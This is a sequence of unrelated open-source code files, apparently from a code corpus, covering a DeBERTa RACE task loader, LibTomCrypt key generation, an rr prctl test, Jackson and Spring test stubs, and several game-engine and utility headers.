# # Author: <EMAIL> # Date: 01/25/2019 # from glob import glob from collections import OrderedDict,defaultdict,Sequence import copy import math from scipy.special import softmax import numpy as np import pdb import os import sys import csv import random import torch import re import ujson as json from DeBERTa.apps.tasks.metrics import * from DeBERTa.apps.tasks import EvalData, Task,register_task from DeBERTa.utils import xtqdm as tqdm from DeBERTa.data import ExampleInstance, ExampleSet, DynamicDataset,example_to_feature from DeBERTa.data.example import * from DeBERTa.utils import get_logger from DeBERTa.data.example import _truncate_segments from DeBERTa.apps.models.multi_choice import MultiChoiceModel logger=get_logger() __all__ = ["MyRACETask"] @register_task(name="MyRACE", desc="ReAding Comprehension dataset collected from English Examinations, http://www.qizhexie.com/data/RACE_leaderboard.html") class MyRACETask(Task): def __init__(self, data_dir, tokenizer, args, **kwargs): super().__init__(tokenizer, args, **kwargs) self.data_dir = data_dir def train_data(self, max_seq_len=512, dataset_size=None, epochs=1, mask_gen=None, **kwargs): middle = self.load_jsonl(os.path.join(self.data_dir, 'train_middle.jsonl')) high = self.load_jsonl(os.path.join(self.data_dir, 'train_high.jsonl')) examples = ExampleSet(middle + high) if dataset_size is None: dataset_size = len(examples)*epochs return DynamicDataset(examples, feature_fn = self.get_feature_fn(max_seq_len=max_seq_len, mask_gen=mask_gen), \ dataset_size = dataset_size, shuffle=True, **kwargs) def eval_data(self, max_seq_len=512, dataset_size=None, **kwargs): ds = [ self._data('test-high', 'test_high.jsonl', 'test', ignore_metric=True), self._data('test-middle', 'test_middle.jsonl', 'test', ignore_metric=True), self._data('test', ['test_middle.jsonl', 'test_high.jsonl'], 'test'), ] for d in ds: if dataset_size is None: _size = len(d.data) d.data = DynamicDataset(d.data, feature_fn = self.get_feature_fn(max_seq_len=max_seq_len), dataset_size = _size, **kwargs) return ds def test_data(self,max_seq_len=512, dataset_size = None, **kwargs): """See base class.""" ds = [ self._data('high', 'test_high.jsonl', 'test'), self._data('middle', 'test_middle.jsonl', 'test'), ] for d in ds: if dataset_size is None: _size = len(d.data) d.data = DynamicDataset(d.data, feature_fn = self.get_feature_fn(max_seq_len=max_seq_len), dataset_size = _size, **kwargs) return ds def _data(self, name, path, type_name = 'dev', ignore_metric=False): if isinstance(path, str): path = [path] data = [] for p in path: input_src = os.path.join(self.data_dir, p) assert os.path.exists(input_src), f"{input_src} doesn't exists" data.extend(self.load_jsonl(input_src)) predict_fn = self.get_predict_fn() examples = ExampleSet(data) return EvalData(name, examples, metrics_fn = self.get_metrics_fn(), predict_fn = predict_fn, ignore_metric=ignore_metric, critial_metrics=['accuracy']) def get_metrics_fn(self): """Calcuate metrics based on prediction results""" def metrics_fn(logits, labels): metrics = OrderedDict(accuracy= metric_accuracy(logits, labels)) return metrics return metrics_fn def get_labels(self): """See base class.""" return ["A", "B", "C", "D"] def load_jsonl(self, path): examples = [] with open(path, encoding='utf-8') as fs: data = [json.loads(l) for l in fs] for d in data: page = d["article"] for q,o,a in zip(d["questions"], d["options"], d["answers"]): example = ExampleInstance(segments=[page, q, *o], label=self.label2id(a)) examples.append(example) return examples def 
get_feature_fn(self, max_seq_len = 512, mask_gen = None): def _example_to_feature(example, rng=None, ext_params=None, **kwargs): return self.example_to_feature(self.tokenizer, example, max_seq_len = max_seq_len, \ rng = rng, mask_generator = mask_gen, ext_params = ext_params, **kwargs) return _example_to_feature def example_to_feature(self, tokenizer, example, max_seq_len=512, rng=None, mask_generator = None, ext_params=None, label_type='int', **kwargs): if not rng: rng = random max_num_tokens = max_seq_len - 3 def _normalize(text): text = re.sub(r'\s+', ' ', text.strip('\t \r\n_').replace('\n', ' ')).strip() return text # page,question,options context = tokenizer.tokenize(_normalize(example.segments[0])) features = OrderedDict(input_ids = [], type_ids = [], position_ids = [], input_mask = []) for option in example.segments[2:]: #TODO: truncate question = example.segments[1] qa_cat = " ".join([question, option]) qa_cat = tokenizer.tokenize(_normalize(qa_cat))[:160] segments = [context, qa_cat] segments = _truncate_segments(segments, max_num_tokens, rng) tokens = ['[CLS]'] type_ids = [0] for i,s in enumerate(segments): tokens.extend(s) tokens.append('[SEP]') type_ids.extend([i]*(len(s)+1)) token_ids = tokenizer.convert_tokens_to_ids(tokens) pos_ids = list(range(len(token_ids))) rel_pos = [] input_mask = [1]*len(token_ids) features['input_ids'].append(token_ids) features['type_ids'].append(type_ids) features['position_ids'].append(pos_ids) features['input_mask'].append(input_mask) padding_size = max(0, max_seq_len - len(token_ids)) for f in features: features[f][-1].extend([0]*padding_size) for f in features: features[f] = torch.tensor(features[f], dtype=torch.int) if example.label is not None: label_type = torch.int if label_type=='int' else torch.float features['labels'] = torch.tensor(example.label, dtype=label_type) return features def get_model_class_fn(self): def partial_class(*wargs, **kwargs): return MultiChoiceModel.load_model(*wargs, **kwargs) return partial_class @classmethod def add_arguments(cls, parser): """Add task specific arguments e.g. parser.add_argument('--data_dir', type=str, help='The path of data directory.') """ parser.add_argument('--task_example_arg', type=str, default=None, help='An example task specific argument') return parser
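# An illustrative, framework-free sketch of what load_jsonl() above does with one RACE-style
# record: the sample record is made up, the field names mirror the code (article / questions /
# options / answers), and the label mapping assumes label2id() indexes into get_labels()
# (A-D -> 0-3), which is an assumption about the base Task class.
import json

record = {
    "article": "Tom went to the market because he needed apples.",
    "questions": ["Why did Tom go to the market?"],
    "options": [["To buy apples", "To meet a friend", "To sell fruit", "To take a walk"]],
    "answers": ["A"],
}

label_map = {label: i for i, label in enumerate(["A", "B", "C", "D"])}

examples = []
for question, options, answer in zip(record["questions"], record["options"], record["answers"]):
    # segments = [passage, question, option_1..option_4], label = index of the correct option
    examples.append({
        "segments": [record["article"], question, *options],
        "label": label_map[answer],
    })

print(json.dumps(examples[0], indent=2))  # one multiple-choice example per question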
2,662
342
/* LibTomCrypt, modular cryptographic library -- <NAME> * * LibTomCrypt is a library that provides various cryptographic * algorithms in a highly modular and flexible manner. * * The library is free for all purposes without any express * guarantee it works. * * <NAME>, <EMAIL>, http://libtomcrypt.com */ #include "tomcrypt.h" /** @file katja_make_key.c Katja key generation, <NAME> */ #ifdef MKAT /** Create a Katja key @param prng An active PRNG state @param wprng The index of the PRNG desired @param size The size of the modulus (key size) desired (octets) @param key [out] Destination of a newly created private key pair @return CRYPT_OK if successful, upon error all allocated ram is freed */ int katja_make_key(prng_state *prng, int wprng, int size, katja_key *key) { void *p, *q, *tmp1, *tmp2; int err; LTC_ARGCHK(key != NULL); LTC_ARGCHK(ltc_mp.name != NULL); if ((size < (MIN_KAT_SIZE/8)) || (size > (MAX_KAT_SIZE/8))) { return CRYPT_INVALID_KEYSIZE; } if ((err = prng_is_valid(wprng)) != CRYPT_OK) { return err; } if ((err = mp_init_multi(&p, &q, &tmp1, &tmp2, NULL)) != CRYPT_OK) { return err; } /* divide size by three */ size = (((size << 3) / 3) + 7) >> 3; /* make prime "q" (we negate size to make q == 3 mod 4) */ if ((err = rand_prime(q, -size, prng, wprng)) != CRYPT_OK) { goto done; } if ((err = mp_sub_d(q, 1, tmp1)) != CRYPT_OK) { goto done; } /* make prime "p" */ do { if ((err = rand_prime(p, size+1, prng, wprng)) != CRYPT_OK) { goto done; } if ((err = mp_gcd(p, tmp1, tmp2)) != CRYPT_OK) { goto done; } } while (mp_cmp_d(tmp2, 1) != LTC_MP_EQ); /* make key */ if ((err = mp_init_multi(&key->d, &key->N, &key->dQ, &key->dP, &key->qP, &key->p, &key->q, &key->pq, NULL)) != CRYPT_OK) { goto error; } /* n=p^2q and 1/n mod pq */ if ((err = mp_copy( p, key->p)) != CRYPT_OK) { goto error2; } if ((err = mp_copy( q, key->q)) != CRYPT_OK) { goto error2; } if ((err = mp_mul(key->p, key->q, key->pq)) != CRYPT_OK) { goto error2; } /* tmp1 = pq */ if ((err = mp_mul(key->pq, key->p, key->N)) != CRYPT_OK) { goto error2; } /* N = p^2q */ if ((err = mp_sub_d( p, 1, tmp1)) != CRYPT_OK) { goto error2; } /* tmp1 = q-1 */ if ((err = mp_sub_d( q, 1, tmp2)) != CRYPT_OK) { goto error2; } /* tmp2 = p-1 */ if ((err = mp_lcm(tmp1, tmp2, key->d)) != CRYPT_OK) { goto error2; } /* tmp1 = lcd(p-1,q-1) */ if ((err = mp_invmod( key->N, key->d, key->d)) != CRYPT_OK) { goto error2; } /* key->d = 1/N mod pq */ /* optimize for CRT now */ /* find d mod q-1 and d mod p-1 */ if ((err = mp_mod( key->d, tmp1, key->dP)) != CRYPT_OK) { goto error2; } /* dP = d mod p-1 */ if ((err = mp_mod( key->d, tmp2, key->dQ)) != CRYPT_OK) { goto error2; } /* dQ = d mod q-1 */ if ((err = mp_invmod( q, p, key->qP)) != CRYPT_OK) { goto error2; } /* qP = 1/q mod p */ /* set key type (in this case it's CRT optimized) */ key->type = PK_PRIVATE; /* return ok and free temps */ err = CRYPT_OK; goto done; error2: mp_clear_multi( key->d, key->N, key->dQ, key->dP, key->qP, key->p, key->q, key->pq, NULL); error: done: mp_clear_multi( tmp2, tmp1, p, q, NULL); return err; } #endif /* $Source: /cvs/libtom/libtomcrypt/src/pk/katja/katja_make_key.c,v $ */ /* $Revision: 1.10 $ */ /* $Date: 2006/03/31 14:15:35 $ */
1,786
5,156
/* -*- Mode: C; tab-width: 8; c-basic-offset: 2; indent-tabs-mode: nil; -*- */ #include "util.h" int main(void) { char setname[16] = "prctl-test"; char getname[16]; unsigned long slack = sizeof(unsigned long) == 4 ? 1024 * 1024 * 1024 : (unsigned long)(1024LL * 1024 * 1024 * 8); int sig = 99; int tsc = 99; int dummy; test_assert(0 == prctl(PR_SET_KEEPCAPS, 0)); test_assert(0 == prctl(PR_GET_KEEPCAPS)); test_assert(0 == prctl(PR_SET_KEEPCAPS, 1)); test_assert(1 == prctl(PR_GET_KEEPCAPS)); test_assert(0 == prctl(PR_SET_NAME, setname)); test_assert(0 == prctl(PR_GET_NAME, getname)); atomic_printf("set name `%s'; got name `%s'\n", setname, getname); test_assert(!strcmp(getname, setname)); test_assert(0 == prctl(PR_SET_DUMPABLE, 0)); test_assert(0 == prctl(PR_GET_DUMPABLE)); test_assert(0 == prctl(PR_SET_DUMPABLE, 1)); test_assert(1 == prctl(PR_GET_DUMPABLE)); test_assert(0 == prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)); test_assert(1 == prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0)); test_assert(0 == prctl(PR_SET_TIMERSLACK, slack)); /* prctl coerces its result to int */ test_assert((int)slack == prctl(PR_GET_TIMERSLACK)); test_assert(0 == prctl(PR_MCE_KILL, PR_MCE_KILL_SET, PR_MCE_KILL_EARLY, 0, 0)); test_assert(PR_MCE_KILL_EARLY == prctl(PR_MCE_KILL_GET, 0, 0, 0, 0)); test_assert(-1 == prctl(PR_GET_ENDIAN, &dummy) && errno == EINVAL); test_assert(-1 == prctl(PR_GET_FPEMU, &dummy) && errno == EINVAL); test_assert(-1 == prctl(PR_GET_FPEXC, &dummy) && errno == EINVAL); test_assert(-1 == prctl(PR_GET_UNALIGN, &dummy) && errno == EINVAL); test_assert(0 == prctl(PR_GET_PDEATHSIG, (unsigned long)&sig)); test_assert(sig == 0); test_assert(0 == prctl(PR_GET_TSC, (unsigned long)&tsc)); test_assert(tsc == PR_TSC_ENABLE); test_assert(0 == prctl(PR_GET_SECCOMP)); int reaper; test_assert(0 == prctl(PR_SET_CHILD_SUBREAPER, 1)); test_assert(0 == prctl(PR_GET_CHILD_SUBREAPER, &reaper)); test_assert(reaper == 1); unsigned int size = 0; test_assert(0 == prctl(PR_SET_MM, PR_SET_MM_MAP_SIZE, &size, 0, 0)); test_assert(size != 0); // On a kernel without PR_SET_VMA, this will return EINVAL. // On a kernel with it, it should return EBADF, because // the rr page is not an anonymous mapping. ssize_t page_size = sysconf(_SC_PAGE_SIZE); test_assert(-1 == prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, 0x7000000, page_size, "foo") && (errno == EINVAL || errno == EBADF)); atomic_puts("EXIT-SUCCESS"); return 0; }
1,165
898
/**************************************************************************** Copyright (c) 2016-2017 Chukong Technologies Inc. http://www.cocos2d-x.org Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ****************************************************************************/ #pragma once #include "audio/android/IAudioPlayer.h" #include "audio/android/OpenSLHelper.h" #include "audio/android/PcmData.h" #include <mutex> #include <condition_variable> namespace cocos2d { namespace experimental { class AudioMixerController; class PcmAudioService { public: inline int getChannelCount() const { return _numChannels; }; inline int getSampleRate() const { return _sampleRate; }; private: PcmAudioService(SLEngineItf engineItf, SLObjectItf outputMixObject); virtual ~PcmAudioService(); bool init(AudioMixerController* controller, int numChannels, int sampleRate, int bufferSizeInBytes); bool enqueue(); void bqFetchBufferCallback(SLAndroidSimpleBufferQueueItf bq); void pause(); void resume(); private: SLEngineItf _engineItf; SLObjectItf _outputMixObj; SLObjectItf _playObj; SLPlayItf _playItf; SLVolumeItf _volumeItf; SLAndroidSimpleBufferQueueItf _bufferQueueItf; int _numChannels; int _sampleRate; int _bufferSizeInBytes; AudioMixerController* _controller; friend class SLPcmAudioPlayerCallbackProxy; friend class AudioPlayerProvider; }; }} // namespace cocos2d { namespace experimental {
724
461
import java.util.HashMap; import java.util.Map; public class MapSum2 { private Node root; private class Node { private int val; private Map<Character, Node> next; public Node(boolean isWord, int val) { this.val = val; this.next = new HashMap<>(); } public Node() { this(false, 0); } } /** * Initialize your data structure here. */ public MapSum2() { root = new Node(); } public void insert(String key, int val) { Node currNode = root; Character c; for (int i = 0; i < key.length(); i++) { c = key.charAt(i); if (currNode.next.get(c) == null) { currNode.next.put(c, new Node()); } currNode = currNode.next.get(c); } currNode.val = val; } public int sum(String prefix) { Node node = root; Character c; for (int i = 0; i < prefix.length(); i++) { c = prefix.charAt(i); if (node.next.get(c) == null) { return 0; } node = node.next.get(c); } return dfs(node); } // Sum of val over the subtree rooted at node private int dfs(Node node) { // Note: the starting value is node.val, not 0 int sum = node.val; for (Character c : node.next.keySet()) { sum += dfs(node.next.get(c)); } return sum; } public static void main(String[] args) { MapSum2 mapSum2 = new MapSum2(); mapSum2.insert("apple", 3); int sum1 = mapSum2.sum("ap");// Output: 3 System.out.println(sum1); mapSum2.insert("app", 2); //Output: Null int sum2 = mapSum2.sum("ap");//Output: 5 System.out.println(sum2); } }
1,031
2,816
<gh_stars>1000+ //===----------------------------------------------------------------------===// // DuckDB // // duckdb/common/enums/optimizer_type.hpp // // //===----------------------------------------------------------------------===// #pragma once #include "duckdb/common/constants.hpp" namespace duckdb { enum class OptimizerType : uint32_t { INVALID = 0, EXPRESSION_REWRITER, FILTER_PULLUP, FILTER_PUSHDOWN, REGEX_RANGE, IN_CLAUSE, JOIN_ORDER, DELIMINATOR, UNUSED_COLUMNS, STATISTICS_PROPAGATION, COMMON_SUBEXPRESSIONS, COMMON_AGGREGATE, COLUMN_LIFETIME, TOP_N, REORDER_FILTER }; string OptimizerTypeToString(OptimizerType type); OptimizerType OptimizerTypeFromString(const string &str); } // namespace duckdb
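// A plausible, hypothetical implementation of the two helpers declared above, shown for
// illustration only -- it is not DuckDB's actual source, and the string spellings are
// assumptions. Only a few enum members are handled to keep the sketch short.
#include <cstdint>
#include <stdexcept>
#include <string>

namespace duckdb_sketch {

enum class OptimizerType : uint32_t { INVALID = 0, EXPRESSION_REWRITER, FILTER_PULLUP, FILTER_PUSHDOWN };

std::string OptimizerTypeToString(OptimizerType type) {
    switch (type) {
    case OptimizerType::EXPRESSION_REWRITER:
        return "expression_rewriter";
    case OptimizerType::FILTER_PULLUP:
        return "filter_pullup";
    case OptimizerType::FILTER_PUSHDOWN:
        return "filter_pushdown";
    default:
        return "invalid";
    }
}

OptimizerType OptimizerTypeFromString(const std::string &str) {
    if (str == "expression_rewriter") {
        return OptimizerType::EXPRESSION_REWRITER;
    }
    if (str == "filter_pullup") {
        return OptimizerType::FILTER_PULLUP;
    }
    if (str == "filter_pushdown") {
        return OptimizerType::FILTER_PUSHDOWN;
    }
    throw std::invalid_argument("unknown optimizer type: " + str);
}

} // namespace duckdb_sketch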
293
719
<reponame>skysliently/momo-code-sec-inspector-java-myversion<filename>src/test/testData/lang/java/rule/momosecurity/BroadCORSAllowOrigin/stub/CorsRegistration.java package org.springframework.web.servlet.config.annotation; public class CorsRegistration { public CorsRegistration(String arg1) {} public CorsRegistration allowedOrigins(String origins) { return this; } }
131
437
<filename>src/test/java/com/fasterxml/jackson/dataformat/xml/fuzz/Fuzz465_32906_CDataReadTest.java package com.fasterxml.jackson.dataformat.xml.fuzz; import com.fasterxml.jackson.core.exc.StreamReadException; import com.fasterxml.jackson.databind.JsonNode; import com.fasterxml.jackson.dataformat.xml.XmlMapper; import com.fasterxml.jackson.dataformat.xml.XmlTestBase; public class Fuzz465_32906_CDataReadTest extends XmlTestBase { private final XmlMapper MAPPER = newMapper(); public void testIssue465() throws Exception { byte[] doc = readResource("/data/fuzz-32906.xml"); try { JsonNode root = MAPPER.readTree(doc); fail("Should not pass, got: "+root); } catch (StreamReadException e) { verifyException(e, "Unexpected EOF in CDATA"); } } }
339
2,542
#pragma once namespace KtlThreadpool{ #define VOLATILE_MEMORY_BARRIER() asm volatile ("" : : : "memory") template<typename T> inline T VolatileLoad(T const * pt) { T val = *(T volatile const *)pt; VOLATILE_MEMORY_BARRIER(); return val; } template<typename T> inline void VolatileStore(T* pt, T val) { VOLATILE_MEMORY_BARRIER(); *(T volatile *)pt = val; } template <typename T> class Volatile { private: T m_val; public: inline Volatile() { } inline Volatile(const T &val) { ((volatile T &) m_val) = val; } inline Volatile(const Volatile<T> &other) { ((volatile T &) m_val) = other.Load(); } inline T Load() const { return VolatileLoad(&m_val); } inline T LoadWithoutBarrier() const { return ((volatile T &) m_val); } inline void Store(const T& val) { VolatileStore(&m_val, val); } inline void StoreWithoutBarrier(const T& val) const { ((volatile T &)m_val) = val; } inline volatile T* GetPointer() { return (volatile T*)&m_val; } inline T& RawValue() { return m_val; } inline operator T() const { return this->Load(); } inline Volatile<T>& operator=(T val) {Store(val); return *this;} inline T volatile * operator&() { return this->GetPointer(); } inline T volatile const * operator&() const { return this->GetPointer(); } template<typename TOther> inline bool operator==(const TOther& other) const { return this->Load() == other; } template<typename TOther> inline bool operator!=(const TOther& other) const { return this->Load() != other; } inline Volatile<T>& operator+=(T val) { Store(this->Load() + val); return *this; } inline Volatile<T>& operator-=(T val) { Store(this->Load() - val); return *this; } inline Volatile<T>& operator|=(T val) { Store(this->Load() | val); return *this; } inline Volatile<T>& operator&=(T val) { Store(this->Load() & val); return *this; } inline bool operator!() const { return !this->Load(); } inline Volatile& operator++() { this->Store(this->Load()+1); return *this; } inline T operator++(int) { T val = this->Load(); this->Store(val+1); return val; } inline Volatile& operator--() { this->Store(this->Load()-1); return *this; } inline T operator--(int) { T val = this->Load(); this->Store(val-1); return val; } }; }
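// A minimal usage sketch for the Volatile<T> wrapper above. The include name is a
// hypothetical assumption (wherever KtlThreadpool::Volatile<T> actually lives); for new,
// portable code std::atomic would normally be preferred, since this wrapper only inserts
// compiler barriers around loads and stores.
#include <cstdio>
#include <thread>
// #include "volatile_util.h"   // assumed header providing KtlThreadpool::Volatile<T>

int main() {
    KtlThreadpool::Volatile<bool> stopRequested(false);
    KtlThreadpool::Volatile<int> counter(0);

    std::thread worker([&] {
        while (!stopRequested.Load()) {   // Load() issues a compiler barrier around the read
            ++counter;                    // operator++ is a Load() followed by a Store()
        }
    });

    while (counter.Load() < 1000) {
        // spin until the worker has made some progress
    }
    stopRequested = true;                 // operator=(T) forwards to Store()
    worker.join();

    std::printf("counter reached %d\n", counter.Load());
    return 0;
}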
1,186
348
<filename>docs/data/leg-t2/038/03810420.json {"nom":"Saint-Martin-de-Vaulserre","circ":"10ème circonscription","dpt":"Isère","inscrits":236,"abs":134,"votants":102,"blancs":6,"nuls":0,"exp":96,"res":[{"nuance":"REM","nom":"<NAME>","voix":68},{"nuance":"FN","nom":"<NAME>","voix":28}]}
117
412
public abstract class MyAbstractClass { abstract public int num(); public int concreteNum() { return 11; } }
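// A small illustrative companion class (not from the original source) showing how the abstract
// class above is meant to be used: a subclass supplies num(), while concreteNum() is inherited.
public class MyConcreteClass extends MyAbstractClass {
    @Override
    public int num() {
        return 42;
    }

    public static void main(String[] args) {
        MyAbstractClass instance = new MyConcreteClass();
        System.out.println(instance.num());         // 42, from the subclass
        System.out.println(instance.concreteNum()); // 11, inherited implementation
    }
}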
35
674
"""update version string during build""" #============================================================================= # imports #============================================================================= from __future__ import with_statement # core import os import re import time from distutils.dist import Distribution # pkg # local __all__ = [ "stamp_source", "stamp_distutils_output", ] #============================================================================= # helpers #============================================================================= def get_command_class(opts, name): return opts['cmdclass'].get(name) or Distribution().get_command_class(name) def stamp_source(base_dir, version, dry_run=False): """update version string in passlib dist""" path = os.path.join(base_dir, "passlib", "__init__.py") with open(path) as fh: input = fh.read() output, count = re.subn('(?m)^__version__\s*=.*$', '__version__ = ' + repr(version), input) assert count == 1, "failed to replace version string" if not dry_run: os.unlink(path) # sdist likes to use hardlinks with open(path, "w") as fh: fh.write(output) def stamp_distutils_output(opts, version): # subclass buildpy to update version string in source _build_py = get_command_class(opts, "build_py") class build_py(_build_py): def build_packages(self): _build_py.build_packages(self) stamp_source(self.build_lib, version, self.dry_run) opts['cmdclass']['build_py'] = build_py # subclass sdist to do same thing _sdist = get_command_class(opts, "sdist") class sdist(_sdist): def make_release_tree(self, base_dir, files): _sdist.make_release_tree(self, base_dir, files) stamp_source(base_dir, version, self.dry_run) opts['cmdclass']['sdist'] = sdist #============================================================================= # eof #=============================================================================
708
2,113
<filename>Engine/source/afx/forces/afxForce.h<gh_stars>1000+ //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// // Arcane-FX for MIT Licensed Open Source version of Torque 3D from GarageGames // Copyright (C) 2015 Faust Logic, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to // deal in the Software without restriction, including without limitation the // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or // sell copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS // IN THE SOFTWARE. // //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// #ifndef _AFX_FORCE_H_ #define _AFX_FORCE_H_ //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// // afxForce Data class afxForceDesc; class afxForceData : public GameBaseData { typedef GameBaseData Parent; public: StringTableEntry force_set_name; afxForceDesc* force_desc; public: /*C*/ afxForceData(); /*C*/ afxForceData(const afxForceData&, bool = false); virtual bool onAdd(); virtual void packData(BitStream* stream); virtual void unpackData(BitStream* stream); virtual bool allowSubstitutions() const { return true; } virtual afxForceData* cloneAndPerformSubstitutions(const SimObject*, S32 index=0)=0; static void initPersistFields(); }; //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// // afxForce class afxForce { afxForceData* datablock; protected: F32 fade_amt; public: /*C*/ afxForce(); /*D*/ ~afxForce(); virtual bool onNewDataBlock(afxForceData* dptr, bool reload); void setFadeAmount(F32 amt) { fade_amt = amt; } virtual void start() {}; virtual void update(F32 dt) {}; virtual Point3F evaluate(Point3F pos, Point3F v, F32 mass) { return Point3F(0,0,0); }; //=0; }; //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// class afxForceDesc { private: static Vector<afxForceDesc*>* forces; public: /*C*/ afxForceDesc(); virtual bool testForceType(const SimDataBlock*) const=0; virtual afxForce* create() const=0; static bool identifyForce(afxForceData*); }; //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// #endif // _AFX_FORCE_H_
1,048
898
/****************************************************************************** * Spine Runtimes Software License v2.5 * * Copyright (c) 2013-2016, Esoteric Software * All rights reserved. * * You are granted a perpetual, non-exclusive, non-sublicensable, and * non-transferable license to use, install, execute, and perform the Spine * Runtimes software and derivative works solely for personal or internal * use. Without the written permission of Esoteric Software (see Section 2 of * the Spine Software License Agreement), you may not (a) modify, translate, * adapt, or develop new applications using the Spine Runtimes or otherwise * create derivative works or improvements of the Spine Runtimes or (b) remove, * delete, alter, or obscure any trademarks or any copyright, trademark, patent, * or other intellectual property or proprietary rights notices on or in the * Software, including any copy thereof. Redistributions in binary or source * form must include this license and terms. * * THIS SOFTWARE IS PROVIDED BY ESOTERIC SOFTWARE "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO * EVENT SHALL ESOTERIC SOFTWARE BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES, BUSINESS INTERRUPTION, OR LOSS OF * USE, DATA, OR PROFITS) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. *****************************************************************************/ #include "spine/Color.h" #include "spine/extension.h" spColor* spColor_create() { return MALLOC(spColor, 1); } void spColor_dispose(spColor* self) { if (self) FREE(self); } void spColor_setFromFloats(spColor* self, float r, float g, float b, float a) { self->r = r; self->g = g; self->b = b; self->a = a; } void spColor_setFromColor(spColor* self, spColor* otherColor) { self->r = otherColor->r; self->g = otherColor->g; self->b = otherColor->b; self->a = otherColor->a; } void spColor_addColor(spColor* self, spColor* otherColor) { self->r += otherColor->r; self->g += otherColor->g; self->b += otherColor->b; self->a += otherColor->a; spColor_clamp(self); } void spColor_addFloats(spColor* self, float r, float g, float b, float a) { self->r += r; self->g += g; self->b += b; self->a += a; spColor_clamp(self); } void spColor_clamp(spColor* self) { if (self->r < 0) self->r = 0; else if (self->r > 1) self->r = 1; if (self->g < 0) self->g = 0; else if (self->g > 1) self->g = 1; if (self->b < 0) self->b = 0; else if (self->b > 1) self->b = 1; if (self->a < 0) self->a = 0; else if (self->a > 1) self->a = 1; }
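/*
 * A tiny usage sketch for the color helpers above, assuming the matching declarations from
 * spine/Color.h (an spColor with r/g/b/a floats) are available; the channel values are
 * illustrative.
 */
#include <stdio.h>
#include "spine/Color.h"

int main(void) {
    spColor *tint = spColor_create();
    spColor_setFromFloats(tint, 0.9f, 0.5f, 0.1f, 1.0f);

    /* Adding pushes red above 1.0; spColor_addFloats() clamps every channel back into [0, 1]. */
    spColor_addFloats(tint, 0.3f, 0.3f, 0.3f, 0.0f);
    printf("r=%.2f g=%.2f b=%.2f a=%.2f\n", tint->r, tint->g, tint->b, tint->a);

    spColor_dispose(tint);
    return 0;
}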
974
3,084
